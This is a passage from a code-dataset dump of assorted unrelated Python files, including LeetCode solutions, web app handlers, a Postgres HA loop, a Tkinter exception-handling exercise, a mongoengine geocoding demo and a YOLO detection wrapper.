Queue\n\ndef task_handler(curr_list, result_queue):\n total = 0\n for number in curr_list:\n total += number\n result_queue.put(total)\n\n\ndef main():\n processes = []\n number_list = [x for x in range(1, 100000001)]\n result_queue = Queue()\n index = 0\n for _ in range(8):\n p = Process(target=task_handler, \n args=(number_list[index:index+12500000], result_queue))\n index += 12500000\n processes.append(p)\n p.start()\n\n start = time()\n for p in processes:\n p.join()\n total = 0\n while not result_queue.empty():\n total += result_queue.get()\n print(total)\n end = time()\n print('Excution time: %.3fs' %(end-start))\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"013.py","file_name":"013.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"585563829","text":"# Given an array with n objects colored red, white or blue, sort them in-place so that objects of the same color are adjacent, with the colors in the order red, white and blue.\n\n# Here, we will use the integers 0, 1, and 2 to represent the color red, white, and blue respectively.\n\n# Note: You are not suppose to use the library's sort function for this problem.\n\n# Example:\n\n# Input: [2,0,2,1,1,0]\n# Output: [0,0,1,1,2,2]\n\nclass Solution:\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n n = len(nums)\n p0, p1, p2 = 0, 0, n-1\n while p1 <= p2:\n if nums[p1] == 1:\n p1 += 1\n elif nums[p1] == 0:\n nums[p0], nums[p1] = nums[p1], nums[p0]\n p0 += 1\n p1 += 1\n elif nums[p1] == 2:\n nums[p2], nums[p1] = nums[p1], nums[p2]\n p2 -= 1\n \n# Time: O(nlog(n))\n# Space: O(1)\n# Difficulty: medium","sub_path":"two pointers/python/leetcode75_Sort_Colors.py","file_name":"leetcode75_Sort_Colors.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"252026668","text":"#import logging\nimport json\n\nfrom base_handler import BaseHandler\nfrom chapter import *\nfrom myuser import get_user\nfrom mytemplate import write_template\nfrom question import list_questions, Question\nfrom mymarkdown import mymarkdown,update_links\n\n\"\"\"\nChapters are a way of organising questions. A chapter may either include other\nchapters or questions.\n\"\"\"\n\ndef set_chapter_text(chapter, text, save=False):\n \"\"\"Parse the new text and correct if needed.\n \n Consider input text to have Markdown format.\n - Image names in reference links need to have urls.\n \"\"\"\n chapter.text = update_links(chapter, text)\n chapter.refresh = False\n if save:\n chapter.put()\n\n\ndef set_question_text(chapter, question, text, save=False):\n \"\"\"Parse the new text and correct if needed.\n \n Consider input text to have Markdown format.\n - Image names in reference links need to have urls.\n \"\"\"\n question.text = update_links(chapter, text)\n question.refresh = False\n if save:\n question.put()\n \ndef refresh_chapter(chapter):\n chapter.refresh = True\n chapter.put()\n query = Question.all().filter('chapter =', chapter)\n for q in query.run():\n q.refresh = True\n q.put\n query = Chapter.all().ancestor(chapter.key())\n for c in query.run():\n if c != chapter:\n refresh_chapter(c)\n\n\n###########################################################################\n# Request handlers\n###########################################################################\n \nclass ChapterPage(BaseHandler):\n def get(self):\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n encoded_chapter_key = self.request.get('chapter')\n \n chapter, encoded_chapter_key = get_chapter_by_encoded_key(encoded_chapter_key)\n subchapters = list_edit_chapters(user, chapter)\n subchapters_empty = len(subchapters) == 0\n parents = list_parents(chapter)\n parents.reverse()\n \n if chapter.text != None:\n if chapter.refresh:\n text = chapter.text\n set_chapter_text(chapter, text, True)\n chapter_formatted_text = mymarkdown(chapter.text)\n else:\n chapter_formatted_text = ''\n \n questions = list_questions(chapter)\n for q in questions:\n if q.refresh:\n text = q.text\n set_question_text(chapter, q, text, True)\n q.formatted_text = mymarkdown(q.text)\n \n has_questions = len(questions) > 0\n \n template_values = {\n 'subchapters': subchapters,\n 'subchapters_empty': subchapters_empty,\n 'parents' : parents,\n 'chapter_formatted_text' : chapter_formatted_text,\n 'questions' : questions,\n 'has_questions' : has_questions,\n }\n \n add_chapter_values(template_values, chapter)\n \n write_template(self, user, 'chapter.html',template_values)\n \nclass EditChapterPage(BaseHandler):\n def get(self):\n\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n encoded_chapter_key = self.request.get('chapter')\n chapter, encoded_chapter_key = get_chapter_by_encoded_key(encoded_chapter_key)\n\n questions = list_questions(chapter)\n for q in questions:\n if q.refresh:\n text = q.text\n set_question_text(chapter, q, text, True)\n q.formatted_text = mymarkdown(q.text)\n \n has_questions = len(questions) > 0\n has_text = chapter.text and len(chapter.text) > 0\n template_values = {\n 'questions' : questions,\n 'has_questions' : has_questions,\n 'has_text': has_text,\n }\n add_chapter_values(template_values, chapter)\n template_values['title'] = 'Edit chapter ' + chapter.title\n \n write_template(self, user, 'chapter_edit.html',template_values)\n \n###########################################################################\n# Chapters\n###########################################################################\nclass Chapters(BaseHandler):\n \"\"\"Implements REST service for managing chapters\"\"\"\n def put(self,Id):\n \"\"\"Save a chapter with key == Id\"\"\"\n #raise Exception(self.request.arguments())\n chapter,ekey = get_chapter_by_encoded_key(Id)\n if chapter:\n jsn = json.decoder.JSONDecoder()\n model = jsn.decode( self.request.get('model'))\n #raise Exception(model[0])\n if not 'parent_key' in model:\n self.response.out.write('error')\n return\n chapter.title = model['title']\n if 'text' in model:\n set_chapter_text(chapter, model['text'])\n chapter.put()\n else:\n raise Exception('Saving of chapter failed')\n\n def post(self,Id=None):\n \"\"\"Create new chapter instance and retirn its id which is its key\"\"\"\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n #raise Exception(self.request.get('_method'))\n httpMethod = self.request.get('_method')\n if httpMethod == 'PUT':\n self.put(Id)\n return\n if httpMethod == 'DELETE':\n self.delete(Id)\n return\n if httpMethod == 'GET':\n raise Exception('GET not implemented')\n return\n \n jsn = json.decoder.JSONDecoder()\n model = jsn.decode( self.request.get('model'))\n #raise Exception(model[0])\n if not 'parent_key' in model:\n self.response.out.write('error')\n if not 'title' in model:\n self.response.out.write('error')\n \n root = root_key()\n encoded_parent_key = model['parent_key']\n if encoded_parent_key == 'root':\n parent_key = root\n else:\n parent_key = db.Key(encoded=encoded_parent_key)\n \n title = model['title']\n \n if len(title) > 0:\n# chapter = Chapter(parent=parent_key)\n# chapter.authors.append(user.key())\n# chapter.title = title\n# chapter.put()\n chapter = create_chapter(parent_key, user, title)\n else:\n self.response.out.write('error')\n return\n \n self.response.out.write('{\"id\":\"'+str(chapter.key())+'\"}')\n\n def delete(self, Id):\n \"\"\"Delete a chapter with key == Id\"\"\"\n chapter,ekey = get_chapter_by_encoded_key(Id)\n if chapter:\n chapter.deleteAll()\n else:\n raise Exception('Deleting of chapter failed')\n\nclass AddAuthor(BaseHandler):\n def get(self):\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n try:\n chapter = db.get( self.request.get('chapter') )\n except:\n self.redirect('/')\n return\n \n if not chapter or not chapter.canEdit(user):\n self.redirect('/')\n return\n \n nickname = self.request.get('author')\n user1 = get_user(nickname)\n \n res = {}\n\n if user1:\n res['status'] = 'OK'\n chapter.add_author(user1)\n chapter.put()\n else:\n res['status'] = \"User '\" +nickname+ \"' isn't registered.\"\n \n self.response.out.write(json.dumps(res))\n\nclass RemoveAuthor(BaseHandler):\n def get(self):\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n try:\n chapter = db.get( self.request.get('chapter') )\n except:\n self.redirect('/')\n return\n \n if not chapter or not chapter.isOwner(user):\n self.redirect('/')\n return\n \n nickname = self.request.get('author')\n user1 = get_user(nickname)\n \n res = {}\n res['status'] = 'OK'\n\n if user1:\n chapter.remove_author(user1)\n chapter.put()\n \n self.response.out.write(json.dumps(res))\n","sub_path":"chapter_module.py","file_name":"chapter_module.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"529344559","text":"dic={\n 'ball':'red',\n 'bat':4,\n 'wickets':8,\n 'ball':'green',\n 'bat':3\n }\ntemp = [] \nres = dict() \nfor key, val in dic.items(): \n if val not in temp: \n temp.append(val) \n res[key] = val \nprint(res)","sub_path":"duplicate_keys(6).py","file_name":"duplicate_keys(6).py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358645983","text":"\"\"\"\nTesting for implementations - Will\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom sklearn import metrics\nfrom datetime import datetime as dt\nimport os\nimport transformers\nimport logging as log\nimport sys\n\nimport myio\nimport model\n\n# ============================= Testing Data Loading ==============================\nwd = os.getcwd()\n\n\n# for Spyder to get logging to work\nroot = log.getLogger()\nwhile len(root.handlers):\n root.removeHandler(root.handlers[0])\n\n# define logger\nlog_fname = os.path.join(wd, \"logs\", \"log_{}.log\".format(\n dt.now().strftime(\"%Y%m%d_%H%M\")))\nlog.basicConfig(filename=log_fname,\n format='%(asctime)s - %(name)s - %(message)s',\n level=log.INFO)\nroot.addHandler(log.StreamHandler())\n\nlog.info('Start')\nif True:\n \n # set parameters for IO object\n data_dir = os.path.join(wd, r'cleaned')\n task_names = ['tester']\n tokenizer = transformers.AutoTokenizer.from_pretrained('albert-base-v2')\n max_length = 512\n \n # read in 'tester' data in both train and dev directories\n # only do batch_size of 2\n data_handler = myio.IO(data_dir, task_names, tokenizer, max_length, batch_size = 2)\n data_handler.read_task() \n \n # see that it works\n if False:\n for use in ['train','dev']:\n # get training data_loader\n dl = data_handler.tasks.get('tester').get(use)\n for i,(data, labels) in enumerate(dl):\n print(r'{} batch {} data size is: {}'.format(use, i, data.size()))\n print(r'{} batch {} data is: {}'.format(use, i, data))\n \n for k, obs in enumerate(data):\n print(r'{} batch {} obs {} decoded: {}'.format(use, i, k, tokenizer.decode(obs.tolist())))\n \n print(r'{} batch {} size is: {}'.format(use, i, labels.size()))\n print(r'{} batch {} is: {}'.format(use, i, labels))\n\n# ============================= Test Model ==============================\nif True: \n rep_name = 'albert-base-v2'\n \n loss = nn.CrossEntropyLoss()\n \n config = transformers.AutoConfig.from_pretrained(rep_name)\n learner = model.Model(config, 5, 2)\n \n test_dl = data_handler.tasks.get('tester').get('test')\n \n with torch.no_grad():\n test_data, val_labels = next(iter(test_dl))\n rating, flag = learner(test_data)\n \n print(rating)\n print(flag)\n \n r_val, r_idx = torch.max(rating, dim=1)\n f_val, f_idx = torch.max(flag, dim=1)\n \n r_labels = val_labels[:,0]\n f_labels = val_labels[:,1]\n \n \n r_acc = metrics.accuracy_score(r_labels, r_idx)\n r_f1 = metrics.f1_score(r_labels, r_idx, average='macro')\n \n f_acc = metrics.accuracy_score(f_labels, f_idx)\n f_f1 = metrics.f1_score(f_labels, f_idx, average='macro')\n \n print(r_idx)\n print(r_labels)\n print(r_acc)\n print(r_f1)\n print('='*40)\n print(f_idx)\n print(f_labels)\n print(f_acc)\n print(f_f1)\n print('='*40)\n \n print(loss(rating, r_labels))\n print(loss(flag, f_labels))\n \nlog.info('End') \n\n# release logs from Python\nhandlers = log.getLogger().handlers\nfor handler in handlers:\n handler.close()\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"examples/will_bds_example/tester_wh.py","file_name":"tester_wh.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"511472986","text":"import logging\n\nfrom helpers.errors import EtcdError\nfrom psycopg2 import InterfaceError, OperationalError\n\nlogger = logging.getLogger(__name__)\n\n\nclass Ha:\n\n def __init__(self, state_handler, etcd):\n self.state_handler = state_handler\n self.etcd = etcd\n self.cluster = None\n\n def load_cluster_from_etcd(self):\n self.cluster = self.etcd.get_cluster()\n\n def acquire_lock(self):\n return self.etcd.attempt_to_acquire_leader(self.state_handler.name)\n\n def update_lock(self):\n return self.etcd.update_leader(self.state_handler)\n\n def has_lock(self):\n lock_owner = self.cluster.leader and self.cluster.leader.hostname\n logger.info('Lock owner: %s; I am %s', lock_owner, self.state_handler.name)\n return lock_owner == self.state_handler.name\n\n def demote(self):\n return self.state_handler.demote(self.cluster.leader)\n\n def follow_the_leader(self):\n return self.state_handler.follow_the_leader(self.cluster.leader)\n\n def run_cycle(self):\n try:\n self.load_cluster_from_etcd()\n if not self.state_handler.is_healthy():\n has_lock = self.has_lock()\n self.state_handler.write_recovery_conf(None if has_lock else self.cluster.leader)\n self.state_handler.start()\n if not has_lock:\n return 'started as a secondary'\n logging.info('started as readonly because i had the session lock')\n self.load_cluster_from_etcd()\n\n if self.cluster.is_unlocked():\n if self.state_handler.is_healthiest_node(self.cluster):\n if self.acquire_lock():\n if self.state_handler.is_leader() or self.state_handler.is_promoted:\n return 'acquired session lock as a leader'\n self.state_handler.promote()\n return 'promoted self to leader by acquiring session lock'\n else:\n self.load_cluster_from_etcd()\n if self.state_handler.is_leader():\n self.demote()\n return 'demoted self due after trying and failing to obtain lock'\n else:\n self.follow_the_leader()\n return 'following new leader after trying and failing to obtain lock'\n else:\n self.load_cluster_from_etcd()\n if self.state_handler.is_leader():\n self.demote()\n return 'demoting self because i am not the healthiest node'\n else:\n self.follow_the_leader()\n return 'following a different leader because i am not the healthiest node'\n else:\n if self.has_lock() and self.update_lock():\n try:\n if self.state_handler.is_leader() or self.state_handler.is_promoted:\n return 'no action. i am the leader with the lock'\n self.state_handler.promote()\n return 'promoted self to leader because i had the session lock'\n finally:\n # create replication slots\n self.state_handler.create_replication_slots(self.cluster)\n else:\n logger.info('does not have lock')\n if self.state_handler.is_leader():\n self.demote()\n return 'demoting self because i do not have the lock and i was a leader'\n else:\n self.follow_the_leader()\n return 'no action. i am a secondary and i am following a leader'\n except EtcdError:\n logger.error('Error communicating with Etcd')\n if self.state_handler.is_leader():\n self.state_handler.demote(None)\n return 'demoted self because etcd is not accessible and i was a leader'\n except (InterfaceError, OperationalError):\n logger.error('Error communicating with Postgresql. Will try again')\n","sub_path":"helpers/ha.py","file_name":"ha.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"28812647","text":"import logging\nimport json\n\nLANGUAGES = {\n 'en': u'English',\n 'fr': u'Français',\n 'pt': u'Português',\n}\n\nHOST = 'http://med-db.medicines.localhost:5000/'\nAPI_HOST = 'http://med-db-api.medicines.localhost:5001/'\nSERVER_NAME = 'medicines.localhost:5000'\n\nLOG_LEVEL = logging.DEBUG\nLOGGER_NAME = \"med-db-logger\" # make sure this is not the same as the name of the package to avoid conflicts with Flask's own logger\nDEBUG = True\n\nSQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://med_db:med_db@localhost/med_db'\nSQLALCHEMY_ECHO = True\n\nRESULTS_PER_PAGE = 50\n\nADMIN_USER = \"admin@code4sa.org\"\n\nMAX_AGE = 365\n","sub_path":"instance/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"412820777","text":"\nfrom mongoengine import *\nimport datetime\nimport json\nimport requests\n\nconnect('test')\n\n# Esquema para la BD de pruebas de mongoDB\n\nclass addr(EmbeddedDocument):\n building = StringField()\n street = StringField()\n city = StringField()\n zipcode = IntField()\n coord = GeoPointField()\n\nclass likes(EmbeddedDocument):\n grade = StringField(max_length=1)\n score = IntField()\n date = DateTimeField()\n\nclass restaurants(Document):\n name = StringField(required=True, max_length=80)\n restaurant_id = IntField()\n cuisine = StringField()\n borough = StringField()\n address = EmbeddedDocumentField(addr)\n grades = ListField(EmbeddedDocumentField(likes))\n\n\n#Introduce el bar en la BD con la geolocalizacion de google\ndef addRestaurant(nameFunc, cityFunc, cuisineFunc, boroughFunc):\n r = requests.get('http://maps.googleapis.com/maps/api/geocode/json?address='+nameFunc.replace(\" \", \"+\")+\"+\"+cityFunc.replace(\" \", \"+\"))\n decoded = json.loads(r.text)\n\n streetJS = decoded[\"results\"][0][\"address_components\"][1][\"long_name\"]\n cityJS = decoded[\"results\"][0][\"address_components\"][3][\"long_name\"]\n zipcodeJS = decoded[\"results\"][0][\"address_components\"][6][\"long_name\"]\n coordLatJS = decoded[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n coordLngtJS = decoded[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\n\n dir = addr(street=streetJS, city=cityJS, zipcode=zipcodeJS, coord=[coordLatJS, coordLngtJS])\n r = restaurants(name=nameFunc, cuisine=cuisineFunc, borough=boroughFunc, address=dir)\n r.save()\n\n\naddRestaurant(\"Real asador de castilla\", \"Granada\", \"Asador\", \"Centro\")\naddRestaurant(\"El tintero\", \"Malaga\", \"Pescaito\", \"Playa\")\naddRestaurant(\"Los diamantes\", \"Granada\", \"Pescaito\", \"Centro\")\n\n\nprint(\"-----Tres primeros restaurantes\")\n# Consulta, los tres primeros\nfor r in restaurants.objects[:3]:\n print (r.name, r.address.coord, r.grades[0].date)\n\nprint(\"-----Restaurantes de Pescaito\")\n# Listando los restaurantes que estan en Malaga\nfor r in restaurants.objects(cuisine='Pescaito'):\n print (r.name)\n\nprint(\"-----Restaurante que no esta en el centro\")\n# 10 Primeros restaurantes que no se encuentren en el Centro\nfor r in restaurants.objects(borough__ne='Centro')[:10]:\n print (r.name)\n\nprint(\"-----Restaurantes cerca del punto\")\n#Probando las de geolocalizacion\n#Restaurantes cercanos a los introducidos como ejemplo\nfor r in restaurants.objects(address__coord__within_distance=[(37.17, -3.59), 0.01]):\n print (r.name, r.address.coord)\n","sub_path":"tarea3/popylate.py","file_name":"popylate.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269568777","text":"'''\r\nCount Possible Decodings of a given Digit Sequence\r\nLet 1 represent ‘A’, 2 represents ‘B’, etc. Given a digit sequence, count the number of possible decodings of the given\r\n digit sequence\r\n Input: digits[] = \"121\"\r\nOutput: 3\r\n// The possible decodings are \"ABA\", \"AU\", \"LA\"\r\n\r\n'''\r\n\r\ndef decode(digit,n):\r\n count=[0]*(n+1)\r\n count[0],count[1]=1,1\r\n\r\n for i in range(2,n+1):\r\n count[i]=0\r\n\r\n # If the last digit is not 0, then last\r\n # digit must add to the number of words\r\n if digit[i-1]>0:\r\n count[i]=count[i-1]\r\n\r\n # If second last digit is smaller than 2\r\n # and last digit is smaller than 7, then\r\n # last two digits form a valid character\r\n if digit[i-2] in [1,2] and digit[i-1]<=7:\r\n count[i]+=count[i-2]\r\n return count[n]\r\n\r\nif __name__ == '__main__':\r\n arr=[1,2,3,4]\r\n print(decode(arr,len(arr)))","sub_path":"decode_seq_interpretation.py","file_name":"decode_seq_interpretation.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"14463166","text":"import matplotlib.pyplot as plt\n\ndata = (20, 10, 30, 25)\nlabels = 'SH', 'BJ', 'SZ', 'GZ'\ncolors = ('red', 'green', 'blue', 'yellow')\nexplode = (0, 0, 0.2, 0.05)\n\n# 饼图中坐标x、y默认不是1比1的,所以图像会椭圆,需要指定坐标轴1:1以画出正圆\nplt.axes(aspect=1)\n\nplt.pie(x=data,labels=labels,colors=colors,explode=explode, autopct='%0.1f%%', shadow=True)\nplt.show()\n","sub_path":"项目二/Report 1/[Task1]学习python/project_matplotlib/src/piedemo.py","file_name":"piedemo.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"597369548","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"wiki/\", views.wiki, name=\"wiki\"),\n path(\"search\", views.search, name=\"search\"),\n path(\"new\", views.new_page, name=\"new\")\n]\n","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182059652","text":"#---------------------------------------------------------------#\n#\n# Disarm That Bomb!\n#\n# We've all seen films and television shows where the hero needs\n# to disarm a time bomb by cutting the wires leading to the\n# trigger. But which wire to cut first!?! Tension mounts as\n# our hero tries to choose between the red, green and blue\n# wires...!!!\n#\n# Below is a Tkinter-based program that attempts to simulate\n# this scenario. It provides three buttons representing\n# choices of wires to cut and randomly generates the correct\n# sequence. Pushing the buttons in the correct sequence\n# ends the game with a congratulatory message. However,\n# pushing the buttons in the wrong sequence produces error\n# messages in the shell window and prevents the game from\n# reaching a final outcome.\n#\n# Your task is to modify this program so that it doesn't\n# misbehave when the wrong button is pressed and always ends\n# the game properly, either with the bomb being disarmed\n# or exploding. When an incorrect button is pressed it should:\n#\n# a) Display a message in the GUI indicating that the bomb\n# has exploded; and\n# b) Disable all the buttons because the game is over.\n#\n# Importantly, however, you cannot change, delete or disable\n# any of the existing lines of Python code. Instead you must\n# use your knowledge of exception handling to prevent the\n# existing code misbehaving, but without changing it in any\n# way.\n#\n\n# Import the Tkinter functions\nfrom tkinter import Tk, Button, Frame, Label, DISABLED\n\n# Import a random number function\nfrom random import shuffle\n\n# Create a window\nbomb_display = Tk()\n\n# Give the window a title\nbomb_display.title('Disarm That Bomb!')\n\n# Create a label to display the current state of the bomb\ndisplay = Label(bomb_display, font = ('Arial', 48),\n text = \"It's ticking...!\",\n width = 16, bg = 'gold')\n\n# Global variable to define valid sequence of cuts\nvalid_sequence = ['Red', 'Green', 'Blue']\nshuffle(valid_sequence)\n\n# Function that's called when any button is pressed\ndef button_pushed(button, colour):\n global valid_sequence\n # Disable this button so that it can't be pressed again\n button['state'] = DISABLED\n # Confirm that the buttons have been pushed in the right order\n assert valid_sequence[0] == colour\n # Remove the first item from the sequence of pushes required\n valid_sequence.pop(0)\n # See if the bomb has been disarmed yet\n if valid_sequence == []:\n display['text'] = \"You've done it!\"\n display['bg'] = 'green'\n else:\n display['text'] = colour + ' wire cut!'\n \n# The individual functions called when the buttons are pressed\ndef cut_red():\n button_pushed(red_button, 'Red')\n\ndef cut_blue():\n button_pushed(blue_button, 'Blue')\n\ndef cut_green():\n button_pushed(green_button, 'Green')\n\n# Create a frame to hold the buttons\nbuttons = Frame()\n\n# Create the push button widgets\nred_button = Button(buttons, text = ' Cut red wire ',\n activeforeground = 'red', font = ('Arial', 20),\n command = cut_red)\nblue_button = Button(buttons, text = ' Cut blue wire ',\n activeforeground = 'red', font = ('Arial', 20),\n command = cut_blue)\ngreen_button = Button(buttons, text = ' Cut green wire ',\n activeforeground = 'red', font = ('Arial', 20),\n command = cut_green)\n\n# Use the grid geometry manager to put the widgets into their locations\ndisplay.grid(row = 0, column = 0, padx = 5, pady = 10)\nred_button.grid(row = 0, column = 0)\nblue_button.grid(row = 0, column = 1)\ngreen_button.grid(row = 0, column = 2)\nbuttons.grid(row = 1, column = 0)\n\n# Start the event loop to react to user inputs\nbomb_display.mainloop()\n","sub_path":"Workshop11-Questions/8-disarm-that-bomb.py","file_name":"8-disarm-that-bomb.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448363822","text":"import time\n\nname = 'lana'\nresponse = 'what'\npunchline = 'thats how you get ants'\n\n\ndef run():\n print('\\n'*100)\n time.sleep(1)\n\n for i in range(3):\n if i == 2:\n print('{}!'.format(name.upper()))\n time.sleep(0.25)\n else:\n print('{}...'.format(name))\n time.sleep(3)\n\n print('{}!!?'.format(response.upper()))\n time.sleep(1.5)\n print('{}, {}...'.format(punchline, name.upper()))\n time.sleep(3)\n print('\\n'*5)\n\nif __name__ == '__main__':\n run()\n","sub_path":"lana.py","file_name":"lana.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"49802558","text":"\"\"\"\n{\n \"author\": \"Yucheng Huang\",\n \"difficulty\": \"easy\",\n \"link\": \"https://leetcode.com/problems/sum-of-left-leaves/description/\",\n \"beats\": 0.4776,\n \"category\": [\"tree\"],\n \"tags\": [\"DFS\"],\n \"questions\": []\n}\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def DFS(self, node, isLeft):\n assert node is not None\n if node.left is None and node.right is None and isLeft:\n self.ans += node.val\n return\n if node.left:\n self.DFS(node.left, True)\n if node.right:\n self.DFS(node.right, False)\n \n def sumOfLeftLeaves(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.ans = 0\n if root is None:\n return 0\n self.DFS(root, False)\n return self.ans","sub_path":"solutions/404.py","file_name":"404.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97085874","text":"from .utils import *\nfrom .darknet import Darknet\nimport cv2\nfrom PIL import Image, ImageDraw, ImageFont\nfrom .layer_to_boxes import layer_to_boxes as cuda\nimport torch\n\nclass Network():\n def __init__(self, cfgfile, weightfile, conf_thresh=0.5, nms_thresh=0.4, gpus=1):\n self.m = Darknet(cfgfile) # model <=> m\n self.m.print_network()\n self.m.load_weights(weightfile)\n self.conf_thresh = conf_thresh\n self.nms_thresh = nms_thresh\n print('Loading weights from %s... Done!' % (weightfile))\n\n if self.m.num_classes == 20:\n namesfile = 'data/voc.names'\n elif self.m.num_classes == 80:\n namesfile = 'data/coco.names'\n else:\n namesfile = 'data/person.names'\n class_names = load_class_names(namesfile)\n \n self.m.eval()\n self.net = self.m\n\n def get_region_boxes(self, output):\n anchor_step = len(self.m.anchors)//self.m.num_anchors\n assert(output.size(1) == (5+self.m.num_classes)*self.m.num_anchors)\n h = output.size(2)\n w = output.size(3)\n\n # 0.04523301124572754\n # t1 = time.time()\n output = output.view(self.batch*self.m.num_anchors, 5+self.m.num_classes, h*w).transpose(0,1).contiguous().view(5+self.m.num_classes, self.batch*self.m.num_anchors*h*w)\n # print(time.time()-t1)\n # t1 = time.time()\n grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(self.batch*self.m.num_anchors, 1, 1).view(self.batch*self.m.num_anchors*h*w)\n grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(self.batch*self.m.num_anchors, 1, 1).view(self.batch*self.m.num_anchors*h*w)\n # print(time.time()-t1)\n # t1 = time.time()\n xs = torch.sigmoid(output[0]) + grid_x\n ys = torch.sigmoid(output[1]) + grid_y\n # print(time.time()-t1)\n\n anchor_w = torch.Tensor(self.m.anchors).view(self.m.num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))\n anchor_h = torch.Tensor(self.m.anchors).view(self.m.num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))\n anchor_w = anchor_w.repeat(self.batch, 1).repeat(1, 1, h*w).view(self.batch*self.m.num_anchors*h*w)\n anchor_h = anchor_h.repeat(self.batch, 1).repeat(1, 1, h*w).view(self.batch*self.m.num_anchors*h*w)\n ws = torch.exp(output[2]) * anchor_w\n hs = torch.exp(output[3]) * anchor_h\n\n det_confs = torch.sigmoid(output[4])\n\n cls_confs = torch.nn.Softmax(dim=-1)(Variable(output[5:5+self.m.num_classes].transpose(0,1))).data\n cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)\n cls_max_confs = cls_max_confs.view(-1)\n cls_max_ids = cls_max_ids.view(-1)\n\n # t1 = time.time()\n all_boxes = cuda.layer_to_boxes(self.batch, w,h, self.m.num_anchors, self.vector_sizes, self.conf_thresh, det_confs,cls_max_confs,cls_max_ids,xs,ys,ws,hs)\n # print(time.time()-t1)\n return all_boxes\n\n def do_detect(self, img):\n if type(img) == np.ndarray: # cv2 image\n img = torch.from_numpy(img.transpose(0,3,1,2)).float().div(255.0)\n img = torch.autograd.Variable(img)\n output = self.net(img)\n\n output = output.data\n all_boxes = self.get_region_boxes(output)\n final_boxes = []\n for i in range(output.size(0)):\n boxes = all_boxes[i]\n final_boxes.append(nms(boxes, self.nms_thresh))\n return final_boxes\n def return_predict(self,img):\n img_vector = []\n self.vector_sizes = []\n self.batch = img.shape[0]\n for i in range(self.batch):\n self.vector_sizes.append(img[i].shape[:2])\n img_vector.append( cv2.resize(img[i], (self.m.width, self.m.height)) )\n sized = np.array(img_vector)\n bboxes = self.do_detect(sized)\n return bboxes\n\ndef plot_cv2_image(bboxes, img):\n draw = np.zeros_like(img)\n for s, b in enumerate(bboxes):\n for i in b:\n print(i, tuple(i[:2]), tuple(i[2:4]))\n draw[s] = cv2.rectangle(img[s], tuple(i[:2]), tuple(i[2:4]), (255,0,0), 1) \n return draw\n\n\n###########################################\n################## Test ###################\n###########################################\ndef test(*args):\n try:\n assert(len(args)==5) # cfgfile, weightfile, gpus, batch_size, IterationTimes\n cfgfile, weightfile, gpus, batch_size_FOR_TEST, IterationTimes = args\n assert(type(cfgfile)==str) # config file\n assert(type(weightfile)==str) # weights file\n assert(type(gpus)==int and gpus>0) # possible options: 1, other number to take all gpus\n assert(type(batch_size_FOR_TEST)==int and batch_size_FOR_TEST>0) # batch size\n assert(type(IterationTimes)==int and IterationTimes>0) # Iteration times\n\n img = cv2.imread('./data/person_1.jpg')\n # img = np.uint8(np.random.rand(512,512,3)*255) # input: stacked camera images with size of 512x512x3 and type is np.uint8\n img = np.repeat(img[None,:],batch_size_FOR_TEST,axis=0)\n net = Network(cfgfile, weightfile, conf_thresh=0.5, 